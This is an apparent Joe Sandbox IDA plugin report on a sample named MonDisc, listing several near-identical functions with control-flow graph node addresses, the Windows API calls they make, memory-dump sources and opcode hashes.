                              • API ID: Time$ClickDefaultDoubleLang$MessageParentSystemUser
                              • String ID:
                              • API String ID: 2994643361-0
                              • Opcode ID: 91ec8c885c2c6ff6561f716371217a6039addec031bcfe83c507029f45e2ccbf
                              • Instruction ID: c255fcdf3587bed30c444a5272f0466265782f6c69e309d1b253e226457bd770
                              • Opcode Fuzzy Hash: 91ec8c885c2c6ff6561f716371217a6039addec031bcfe83c507029f45e2ccbf
                              • Instruction Fuzzy Hash: 8B825C62E289074AFF545F34AD6A2B92AD47F25370FA4463ED809D2297EF3CF1498103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F5191 Relevance: 73.0, APIs: 48, Instructions: 993timewindowCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 282 7ff62c8f5191-7ff62c8f51a6 284 7ff62c8f51c7-7ff62c8f51d6 282->284 285 7ff62c8f5171-7ff62c8f51a8 call 7ff62c984484 284->285 286 7ff62c8f51d8-7ff62c8f521a call 7ff62c984484 GetMessageTime 284->286 296 7ff62c8f51aa-7ff62c8f51b9 285->296 295 7ff62c8f521c-7ff62c8f522b 286->295 295->295 297 7ff62c8f522d-7ff62c8f5268 call 7ff62c984484 295->297 296->296 298 7ff62c8f51bb-7ff62c8f51c1 296->298 303 7ff62c8f526a-7ff62c8f5279 297->303 298->284 303->303 304 7ff62c8f527b-7ff62c8f5285 303->304 305 7ff62c8f5287-7ff62c8f52c6 call 7ff62c984484 * 2 304->305 312 7ff62c8f52c8-7ff62c8f52ce GetUserDefaultLangID call 7ff62c9ee398 305->312 314 7ff62c8f52d4 312->314 315 7ff62c8f52d6-7ff62c8f52eb GetSystemDefaultLangID 314->315 315->315 316 7ff62c8f52ed-7ff62c8f5361 GetParent GetDoubleClickTime * 2 call 7ff62c984484 315->316 321 7ff62c8f5364-7ff62c8f5373 316->321 321->321 322 7ff62c8f5375-7ff62c8f53ac GetWindowTextLengthW GetMessageExtraInfo call 7ff62c984484 321->322 328 7ff62c8f53af 322->328 329 7ff62c8f53b1-7ff62c8f53ff call 7ff62c984484 328->329 334 7ff62c8f5401-7ff62c8f5418 329->334 334->328 335 7ff62c8f541a-7ff62c8f544a IsIconic * 2 GetDoubleClickTime GetLastActivePopup GetMessageTime 334->335 336 7ff62c8f545d-7ff62c8f5471 call 7ff62c984484 335->336 340 7ff62c8f5473-7ff62c8f54b6 call 7ff62c984484 GetCurrentProcessId 336->340 341 7ff62c8f544c-7ff62c8f544f 336->341 346 7ff62c8f54b8-7ff62c8f54cd GetShellWindow 340->346 341->336 341->340 346->346 347 7ff62c8f54cf-7ff62c8f55cf GetTopWindow GetMessageExtraInfo call 7ff62c984484 * 2 GetParent call 7ff62c984484 * 3 346->347 369 7ff62c8f55d1-7ff62c8f55e0 347->369 369->369 370 7ff62c8f55e2-7ff62c8f55fd call 7ff62c984484 369->370 374 7ff62c8f5603-7ff62c8f561a GetTopWindow 370->374 374->374 375 7ff62c8f561c-7ff62c8f75db call 7ff62c984484 call 7ff62c9844fc call 7ff62c9844f4 call 7ff62c984484 * 2 GetLastActivePopup 374->375 392 7ff62c8f75dd-7ff62c8f75eb 375->392 392->392 393 7ff62c8f75ed-7ff62c8f75fc 392->393 394 7ff62c8f7619-7ff62c8f762c call 7ff62c984484 393->394 398 7ff62c8f75fe-7ff62c8f7602 394->398 399 7ff62c8f762e-7ff62c8f7630 394->399 398->394 398->399 400 7ff62c8f7635 399->400 401 7ff62c8f7637-7ff62c8f7645 400->401 401->401 402 7ff62c8f7647-7ff62c8f7655 401->402 402->400 403 7ff62c8f7657-7ff62c8f76a5 IsIconic call 7ff62c984484 * 2 402->403 411 7ff62c8f76a7-7ff62c8f76b5 403->411 411->411 412 7ff62c8f76b7-7ff62c8f76c6 GetMessageExtraInfo 411->412 413 7ff62c8f76e3-7ff62c8f76f9 call 7ff62c984484 412->413 417 7ff62c8f76fb-7ff62c8f77f3 call 7ff62c984484 * 3 413->417 418 7ff62c8f76c8-7ff62c8f76cc 413->418 431 7ff62c8f77f5-7ff62c8f7803 417->431 418->413 418->417 431->431 432 7ff62c8f7805-7ff62c8f7831 GetMessageExtraInfo GetCurrentProcessId GetShellWindow 431->432 433 7ff62c8f7834-7ff62c8f787e call 7ff62c984484 432->433 438 7ff62c8f7880-7ff62c8f7973 call 7ff62c984484 * 2 GetUserDefaultLangID 433->438 448 7ff62c8f7975-7ff62c8f7983 438->448 448->448 449 7ff62c8f7985-7ff62c8f7ba4 call 7ff62c984484 * 2 GetShellWindow AnyPopup GetCommandLineW call 7ff62c984484 * 2 GetMessageTime call 7ff62c984484 * 2 448->449 473 7ff62c8f7c3c-7ff62c8f7c48 449->473 474 7ff62c8f7c4e-7ff62c8f7c6a GetSystemDefaultLangID GetMessageExtraInfo GetTickCount 473->474 475 7ff62c8f7ba9-7ff62c8f7bad 473->475 476 7ff62c8f7c6d-7ff62c8f7c84 GetTickCount 474->476 475->473 475->474 476->476 477 7ff62c8f7c86-7ff62c8f7c9a GetCurrentProcessId GetTickCount IsIconic 476->477 478 7ff62c8f7c9c-7ff62c8f7caa 477->478 478->478 479 7ff62c8f7cac-7ff62c8f7cf7 GetCommandLineW GetDesktopWindow call 7ff62c984484 IsZoomed 478->479 485 7ff62c8f7cf9-7ff62c8f7d07 479->485 485->485 486 7ff62c8f7d09-7ff62c8f7ec9 call 7ff62c984484 * 2 GetLastActivePopup call 7ff62c984484 * 6 485->486 519 7ff62c8f7ecf-7ff62c8f7edd 486->519 519->519 520 7ff62c8f7edf-7ff62c8f7fcf GetDoubleClickTime call 7ff62c984484 * 2 519->520 528 7ff62c8f8100-7ff62c8f811b call 7ff62c984484 520->528 529 7ff62c8f8029-7ff62c8f8031 520->529 528->529 537 7ff62c8f812e-7ff62c8f81b9 call 7ff62c984484 * 4 528->537 534 7ff62c8f8033-7ff62c8f8041 529->534 534->534 536 7ff62c8f8043-7ff62c8f80f4 call 7ff62c984484 IsIconic call 7ff62c984484 * 2 534->536 536->528 536->537 564 7ff62c8f81b9 537->564 564->564
                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Time$ClickDefaultDoubleLang$MessageParentSystemUser
                              • String ID:
                              • API String ID: 2994643361-0
                              • Opcode ID: 64eabef1d45d85b0c78bb19536166fa48b41f505652a30b45eab00c61a6f173f
                              • Instruction ID: 7c62de22613ab7baebe31576a0eb5790a5b5476824f76493797b5bfa5578368a
                              • Opcode Fuzzy Hash: 64eabef1d45d85b0c78bb19536166fa48b41f505652a30b45eab00c61a6f173f
                              • Instruction Fuzzy Hash: 10825C62E289074AFF545F34AD6A2B92AD47F25374FA4463ED809D2297EF3CF1498103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F516F Relevance: 73.0, APIs: 48, Instructions: 987COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 565 7ff62c8f516f 566 7ff62c8f5171-7ff62c8f51a8 call 7ff62c984484 565->566 571 7ff62c8f51aa-7ff62c8f51b9 566->571 571->571 572 7ff62c8f51bb-7ff62c8f51d6 571->572 572->566 574 7ff62c8f51d8-7ff62c8f521a call 7ff62c984484 GetMessageTime 572->574 579 7ff62c8f521c-7ff62c8f522b 574->579 579->579 580 7ff62c8f522d-7ff62c8f5268 call 7ff62c984484 579->580 585 7ff62c8f526a-7ff62c8f5279 580->585 585->585 586 7ff62c8f527b-7ff62c8f5285 585->586 587 7ff62c8f5287-7ff62c8f52c6 call 7ff62c984484 * 2 586->587 594 7ff62c8f52c8-7ff62c8f52d4 GetUserDefaultLangID call 7ff62c9ee398 587->594 597 7ff62c8f52d6-7ff62c8f52eb GetSystemDefaultLangID 594->597 597->597 598 7ff62c8f52ed-7ff62c8f5361 GetParent GetDoubleClickTime * 2 call 7ff62c984484 597->598 603 7ff62c8f5364-7ff62c8f5373 598->603 603->603 604 7ff62c8f5375-7ff62c8f53ac GetWindowTextLengthW GetMessageExtraInfo call 7ff62c984484 603->604 610 7ff62c8f53af 604->610 611 7ff62c8f53b1-7ff62c8f53ff call 7ff62c984484 610->611 616 7ff62c8f5401-7ff62c8f5418 611->616 616->610 617 7ff62c8f541a-7ff62c8f544a IsIconic * 2 GetDoubleClickTime GetLastActivePopup GetMessageTime 616->617 618 7ff62c8f545d-7ff62c8f5471 call 7ff62c984484 617->618 622 7ff62c8f5473-7ff62c8f54b6 call 7ff62c984484 GetCurrentProcessId 618->622 623 7ff62c8f544c-7ff62c8f544f 618->623 628 7ff62c8f54b8-7ff62c8f54cd GetShellWindow 622->628 623->618 623->622 628->628 629 7ff62c8f54cf-7ff62c8f55cf GetTopWindow GetMessageExtraInfo call 7ff62c984484 * 2 GetParent call 7ff62c984484 * 3 628->629 651 7ff62c8f55d1-7ff62c8f55e0 629->651 651->651 652 7ff62c8f55e2-7ff62c8f55fd call 7ff62c984484 651->652 656 7ff62c8f5603-7ff62c8f561a GetTopWindow 652->656 656->656 657 7ff62c8f561c-7ff62c8f75db call 7ff62c984484 call 7ff62c9844fc call 7ff62c9844f4 call 7ff62c984484 * 2 GetLastActivePopup 656->657 674 7ff62c8f75dd-7ff62c8f75eb 657->674 674->674 675 7ff62c8f75ed-7ff62c8f75fc 674->675 676 7ff62c8f7619-7ff62c8f762c call 7ff62c984484 675->676 680 7ff62c8f75fe-7ff62c8f7602 676->680 681 7ff62c8f762e-7ff62c8f7630 676->681 680->676 680->681 682 7ff62c8f7635 681->682 683 7ff62c8f7637-7ff62c8f7645 682->683 683->683 684 7ff62c8f7647-7ff62c8f7655 683->684 684->682 685 7ff62c8f7657-7ff62c8f76a5 IsIconic call 7ff62c984484 * 2 684->685 693 7ff62c8f76a7-7ff62c8f76b5 685->693 693->693 694 7ff62c8f76b7-7ff62c8f76c6 GetMessageExtraInfo 693->694 695 7ff62c8f76e3-7ff62c8f76f9 call 7ff62c984484 694->695 699 7ff62c8f76fb-7ff62c8f77f3 call 7ff62c984484 * 3 695->699 700 7ff62c8f76c8-7ff62c8f76cc 695->700 713 7ff62c8f77f5-7ff62c8f7803 699->713 700->695 700->699 713->713 714 7ff62c8f7805-7ff62c8f7831 GetMessageExtraInfo GetCurrentProcessId GetShellWindow 713->714 715 7ff62c8f7834-7ff62c8f787e call 7ff62c984484 714->715 720 7ff62c8f7880-7ff62c8f7973 call 7ff62c984484 * 2 GetUserDefaultLangID 715->720 730 7ff62c8f7975-7ff62c8f7983 720->730 730->730 731 7ff62c8f7985-7ff62c8f7ba4 call 7ff62c984484 * 2 GetShellWindow AnyPopup GetCommandLineW call 7ff62c984484 * 2 GetMessageTime call 7ff62c984484 * 2 730->731 755 7ff62c8f7c3c-7ff62c8f7c48 731->755 756 7ff62c8f7c4e-7ff62c8f7c6a GetSystemDefaultLangID GetMessageExtraInfo GetTickCount 755->756 757 7ff62c8f7ba9-7ff62c8f7bad 755->757 758 7ff62c8f7c6d-7ff62c8f7c84 GetTickCount 756->758 757->755 757->756 758->758 759 7ff62c8f7c86-7ff62c8f7c9a GetCurrentProcessId GetTickCount IsIconic 758->759 760 7ff62c8f7c9c-7ff62c8f7caa 759->760 760->760 761 7ff62c8f7cac-7ff62c8f7cf7 GetCommandLineW GetDesktopWindow call 7ff62c984484 IsZoomed 760->761 767 7ff62c8f7cf9-7ff62c8f7d07 761->767 767->767 768 7ff62c8f7d09-7ff62c8f7ec9 call 7ff62c984484 * 2 GetLastActivePopup call 7ff62c984484 * 6 767->768 801 7ff62c8f7ecf-7ff62c8f7edd 768->801 801->801 802 7ff62c8f7edf-7ff62c8f7fcf GetDoubleClickTime call 7ff62c984484 * 2 801->802 810 7ff62c8f8100-7ff62c8f811b call 7ff62c984484 802->810 811 7ff62c8f8029-7ff62c8f8031 802->811 810->811 819 7ff62c8f812e-7ff62c8f81b9 call 7ff62c984484 * 4 810->819 816 7ff62c8f8033-7ff62c8f8041 811->816 816->816 818 7ff62c8f8043-7ff62c8f80f4 call 7ff62c984484 IsIconic call 7ff62c984484 * 2 816->818 818->810 818->819 846 7ff62c8f81b9 819->846 846->846
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6bff2ef37a1e8b58c398f1a0837f5b693386628ce94bc098f00c10939dc4554f
                              • Instruction ID: dc269e71354444110279dc8fec1c8eecf7636a4595e3780099b6099d5ea103cf
                              • Opcode Fuzzy Hash: 6bff2ef37a1e8b58c398f1a0837f5b693386628ce94bc098f00c10939dc4554f
                              • Instruction Fuzzy Hash: 6F825C62E289074AFF545F34AD6A2B92AD57F25370FA4463AD80DD2297EF3CF1498103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F512F Relevance: 73.0, APIs: 48, Instructions: 959COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 847 7ff62c8f512f-7ff62c8f521a call 7ff62c984484 GetMessageTime 855 7ff62c8f521c-7ff62c8f522b 847->855 855->855 856 7ff62c8f522d-7ff62c8f5268 call 7ff62c984484 855->856 861 7ff62c8f526a-7ff62c8f5279 856->861 861->861 862 7ff62c8f527b-7ff62c8f5285 861->862 863 7ff62c8f5287-7ff62c8f52c6 call 7ff62c984484 * 2 862->863 870 7ff62c8f52c8-7ff62c8f52d4 GetUserDefaultLangID call 7ff62c9ee398 863->870 873 7ff62c8f52d6-7ff62c8f52eb GetSystemDefaultLangID 870->873 873->873 874 7ff62c8f52ed-7ff62c8f5361 GetParent GetDoubleClickTime * 2 call 7ff62c984484 873->874 879 7ff62c8f5364-7ff62c8f5373 874->879 879->879 880 7ff62c8f5375-7ff62c8f53ac GetWindowTextLengthW GetMessageExtraInfo call 7ff62c984484 879->880 886 7ff62c8f53af 880->886 887 7ff62c8f53b1-7ff62c8f53ff call 7ff62c984484 886->887 892 7ff62c8f5401-7ff62c8f5418 887->892 892->886 893 7ff62c8f541a-7ff62c8f544a IsIconic * 2 GetDoubleClickTime GetLastActivePopup GetMessageTime 892->893 894 7ff62c8f545d-7ff62c8f5471 call 7ff62c984484 893->894 898 7ff62c8f5473-7ff62c8f54b6 call 7ff62c984484 GetCurrentProcessId 894->898 899 7ff62c8f544c-7ff62c8f544f 894->899 904 7ff62c8f54b8-7ff62c8f54cd GetShellWindow 898->904 899->894 899->898 904->904 905 7ff62c8f54cf-7ff62c8f55cf GetTopWindow GetMessageExtraInfo call 7ff62c984484 * 2 GetParent call 7ff62c984484 * 3 904->905 927 7ff62c8f55d1-7ff62c8f55e0 905->927 927->927 928 7ff62c8f55e2-7ff62c8f55fd call 7ff62c984484 927->928 932 7ff62c8f5603-7ff62c8f561a GetTopWindow 928->932 932->932 933 7ff62c8f561c-7ff62c8f75db call 7ff62c984484 call 7ff62c9844fc call 7ff62c9844f4 call 7ff62c984484 * 2 GetLastActivePopup 932->933 950 7ff62c8f75dd-7ff62c8f75eb 933->950 950->950 951 7ff62c8f75ed-7ff62c8f75fc 950->951 952 7ff62c8f7619-7ff62c8f762c call 7ff62c984484 951->952 956 7ff62c8f75fe-7ff62c8f7602 952->956 957 7ff62c8f762e-7ff62c8f7630 952->957 956->952 956->957 958 7ff62c8f7635 957->958 959 7ff62c8f7637-7ff62c8f7645 958->959 959->959 960 7ff62c8f7647-7ff62c8f7655 959->960 960->958 961 7ff62c8f7657-7ff62c8f76a5 IsIconic call 7ff62c984484 * 2 960->961 969 7ff62c8f76a7-7ff62c8f76b5 961->969 969->969 970 7ff62c8f76b7-7ff62c8f76c6 GetMessageExtraInfo 969->970 971 7ff62c8f76e3-7ff62c8f76f9 call 7ff62c984484 970->971 975 7ff62c8f76fb-7ff62c8f77f3 call 7ff62c984484 * 3 971->975 976 7ff62c8f76c8-7ff62c8f76cc 971->976 989 7ff62c8f77f5-7ff62c8f7803 975->989 976->971 976->975 989->989 990 7ff62c8f7805-7ff62c8f7831 GetMessageExtraInfo GetCurrentProcessId GetShellWindow 989->990 991 7ff62c8f7834-7ff62c8f787e call 7ff62c984484 990->991 996 7ff62c8f7880-7ff62c8f7973 call 7ff62c984484 * 2 GetUserDefaultLangID 991->996 1006 7ff62c8f7975-7ff62c8f7983 996->1006 1006->1006 1007 7ff62c8f7985-7ff62c8f7ba4 call 7ff62c984484 * 2 GetShellWindow AnyPopup GetCommandLineW call 7ff62c984484 * 2 GetMessageTime call 7ff62c984484 * 2 1006->1007 1031 7ff62c8f7c3c-7ff62c8f7c48 1007->1031 1032 7ff62c8f7c4e-7ff62c8f7c6a GetSystemDefaultLangID GetMessageExtraInfo GetTickCount 1031->1032 1033 7ff62c8f7ba9-7ff62c8f7bad 1031->1033 1034 7ff62c8f7c6d-7ff62c8f7c84 GetTickCount 1032->1034 1033->1031 1033->1032 1034->1034 1035 7ff62c8f7c86-7ff62c8f7c9a GetCurrentProcessId GetTickCount IsIconic 1034->1035 1036 7ff62c8f7c9c-7ff62c8f7caa 1035->1036 1036->1036 1037 7ff62c8f7cac-7ff62c8f7cf7 GetCommandLineW GetDesktopWindow call 7ff62c984484 IsZoomed 1036->1037 1043 7ff62c8f7cf9-7ff62c8f7d07 1037->1043 1043->1043 1044 7ff62c8f7d09-7ff62c8f7ec9 call 7ff62c984484 * 2 GetLastActivePopup call 7ff62c984484 * 6 1043->1044 1077 7ff62c8f7ecf-7ff62c8f7edd 1044->1077 1077->1077 1078 7ff62c8f7edf-7ff62c8f7fcf GetDoubleClickTime call 7ff62c984484 * 2 1077->1078 1086 7ff62c8f8100-7ff62c8f811b call 7ff62c984484 1078->1086 1087 7ff62c8f8029-7ff62c8f8031 1078->1087 1086->1087 1095 7ff62c8f812e-7ff62c8f81b9 call 7ff62c984484 * 4 1086->1095 1092 7ff62c8f8033-7ff62c8f8041 1087->1092 1092->1092 1094 7ff62c8f8043-7ff62c8f80f4 call 7ff62c984484 IsIconic call 7ff62c984484 * 2 1092->1094 1094->1086 1094->1095 1122 7ff62c8f81b9 1095->1122 1122->1122
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1729a107793c4e065a05af5c08b281f8753eb9a14e7e7a0112f43c3bc5ed30ff
                              • Instruction ID: f75f8f7684c0fed5b36c5ded3087eaf59489034908deb20d6df8e625951692ff
                              • Opcode Fuzzy Hash: 1729a107793c4e065a05af5c08b281f8753eb9a14e7e7a0112f43c3bc5ed30ff
                              • Instruction Fuzzy Hash: C8825C62D289074AFF555F34AC6A2B92AD47F253B4FA4463AD80DD2297EF3CF1498103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FF62C8F5117 Relevance: 71.4, APIs: 47, Instructions: 863windowtimeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1123 7ff62c8f5117-7ff62c8f521a call 7ff62c984484 GetMessageTime 1131 7ff62c8f521c-7ff62c8f522b 1123->1131 1131->1131 1132 7ff62c8f522d-7ff62c8f5268 call 7ff62c984484 1131->1132 1137 7ff62c8f526a-7ff62c8f5279 1132->1137 1137->1137 1138 7ff62c8f527b-7ff62c8f5285 1137->1138 1139 7ff62c8f5287-7ff62c8f52c6 call 7ff62c984484 * 2 1138->1139 1146 7ff62c8f52c8-7ff62c8f52d4 GetUserDefaultLangID call 7ff62c9ee398 1139->1146 1149 7ff62c8f52d6-7ff62c8f52eb GetSystemDefaultLangID 1146->1149 1149->1149 1150 7ff62c8f52ed-7ff62c8f5361 GetParent GetDoubleClickTime * 2 call 7ff62c984484 1149->1150 1155 7ff62c8f5364-7ff62c8f5373 1150->1155 1155->1155 1156 7ff62c8f5375-7ff62c8f53ac GetWindowTextLengthW GetMessageExtraInfo call 7ff62c984484 1155->1156 1162 7ff62c8f53af 1156->1162 1163 7ff62c8f53b1-7ff62c8f53ff call 7ff62c984484 1162->1163 1168 7ff62c8f5401-7ff62c8f5418 1163->1168 1168->1162 1169 7ff62c8f541a-7ff62c8f544a IsIconic * 2 GetDoubleClickTime GetLastActivePopup GetMessageTime 1168->1169 1170 7ff62c8f545d-7ff62c8f5471 call 7ff62c984484 1169->1170 1174 7ff62c8f5473-7ff62c8f54b6 call 7ff62c984484 GetCurrentProcessId 1170->1174 1175 7ff62c8f544c-7ff62c8f544f 1170->1175 1180 7ff62c8f54b8-7ff62c8f54cd GetShellWindow 1174->1180 1175->1170 1175->1174 1180->1180 1181 7ff62c8f54cf-7ff62c8f55cf GetTopWindow GetMessageExtraInfo call 7ff62c984484 * 2 GetParent call 7ff62c984484 * 3 1180->1181 1203 7ff62c8f55d1-7ff62c8f55e0 1181->1203 1203->1203 1204 7ff62c8f55e2-7ff62c8f55fd call 7ff62c984484 1203->1204 1208 7ff62c8f5603-7ff62c8f561a GetTopWindow 1204->1208 1208->1208 1209 7ff62c8f561c-7ff62c8f75db call 7ff62c984484 call 7ff62c9844fc call 7ff62c9844f4 call 7ff62c984484 * 2 GetLastActivePopup 1208->1209 1226 7ff62c8f75dd-7ff62c8f75eb 1209->1226 1226->1226 1227 7ff62c8f75ed-7ff62c8f75fc 1226->1227 1228 7ff62c8f7619-7ff62c8f762c call 7ff62c984484 1227->1228 1232 7ff62c8f75fe-7ff62c8f7602 1228->1232 1233 7ff62c8f762e-7ff62c8f7630 1228->1233 1232->1228 1232->1233 1234 7ff62c8f7635 1233->1234 1235 7ff62c8f7637-7ff62c8f7645 1234->1235 1235->1235 1236 7ff62c8f7647-7ff62c8f7655 1235->1236 1236->1234 1237 7ff62c8f7657-7ff62c8f76a5 IsIconic call 7ff62c984484 * 2 1236->1237 1245 7ff62c8f76a7-7ff62c8f76b5 1237->1245 1245->1245 1246 7ff62c8f76b7-7ff62c8f76c6 GetMessageExtraInfo 1245->1246 1247 7ff62c8f76e3-7ff62c8f76f9 call 7ff62c984484 1246->1247 1251 7ff62c8f76fb-7ff62c8f77f3 call 7ff62c984484 * 3 1247->1251 1252 7ff62c8f76c8-7ff62c8f76cc 1247->1252 1265 7ff62c8f77f5-7ff62c8f7803 1251->1265 1252->1247 1252->1251 1265->1265 1266 7ff62c8f7805-7ff62c8f7831 GetMessageExtraInfo GetCurrentProcessId GetShellWindow 1265->1266 1267 7ff62c8f7834-7ff62c8f787e call 7ff62c984484 1266->1267 1272 7ff62c8f7880-7ff62c8f7973 call 7ff62c984484 * 2 GetUserDefaultLangID 1267->1272 1282 7ff62c8f7975-7ff62c8f7983 1272->1282 1282->1282 1283 7ff62c8f7985-7ff62c8f7ba4 call 7ff62c984484 * 2 GetShellWindow AnyPopup GetCommandLineW call 7ff62c984484 * 2 GetMessageTime call 7ff62c984484 * 2 1282->1283 1307 7ff62c8f7c3c-7ff62c8f7c48 1283->1307 1308 7ff62c8f7c4e-7ff62c8f7c6a GetSystemDefaultLangID GetMessageExtraInfo GetTickCount 1307->1308 1309 7ff62c8f7ba9-7ff62c8f7bad 1307->1309 1310 7ff62c8f7c6d-7ff62c8f7c84 GetTickCount 1308->1310 1309->1307 1309->1308 1310->1310 1311 7ff62c8f7c86-7ff62c8f7c9a GetCurrentProcessId GetTickCount IsIconic 1310->1311 1312 7ff62c8f7c9c-7ff62c8f7caa 1311->1312 1312->1312 1313 7ff62c8f7cac-7ff62c8f7cf7 GetCommandLineW GetDesktopWindow call 7ff62c984484 IsZoomed 1312->1313 1319 7ff62c8f7cf9-7ff62c8f7d07 1313->1319 1319->1319 1320 7ff62c8f7d09-7ff62c8f7ec9 call 7ff62c984484 * 2 GetLastActivePopup call 7ff62c984484 * 6 1319->1320 1353 7ff62c8f7ecf-7ff62c8f7edd 1320->1353 1353->1353 1354 7ff62c8f7edf-7ff62c8f7fcf GetDoubleClickTime call 7ff62c984484 * 2 1353->1354 1362 7ff62c8f8100-7ff62c8f811b call 7ff62c984484 1354->1362 1363 7ff62c8f8029-7ff62c8f8031 1354->1363 1362->1363 1371 7ff62c8f812e-7ff62c8f81b9 call 7ff62c984484 * 4 1362->1371 1368 7ff62c8f8033-7ff62c8f8041 1363->1368 1368->1368 1370 7ff62c8f8043-7ff62c8f80f4 call 7ff62c984484 IsIconic call 7ff62c984484 * 2 1368->1370 1370->1362 1370->1371 1398 7ff62c8f81b9 1371->1398 1398->1398
                              APIs
                              Memory Dump Source
                              • Source File: 00000016.00000002.513572536.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 00000016.00000002.513552474.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.514775466.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515051181.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515192794.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515222491.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515275975.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515404464.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515442085.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmpDownload File
                              • Associated: 00000016.00000002.515484753.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_22_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: MessageTime
                              • String ID:
                              • API String ID: 761539514-0
                              • Opcode ID: 8b4aad55dd11f83bfe675c7d283c766344b9de2021c3024b51f32849b0f369df
                              • Instruction ID: a2896c53d6ac9807c43ec495a312f5eb81710c50be4b1ad746ef493664e697a5
                              • Opcode Fuzzy Hash: 8b4aad55dd11f83bfe675c7d283c766344b9de2021c3024b51f32849b0f369df
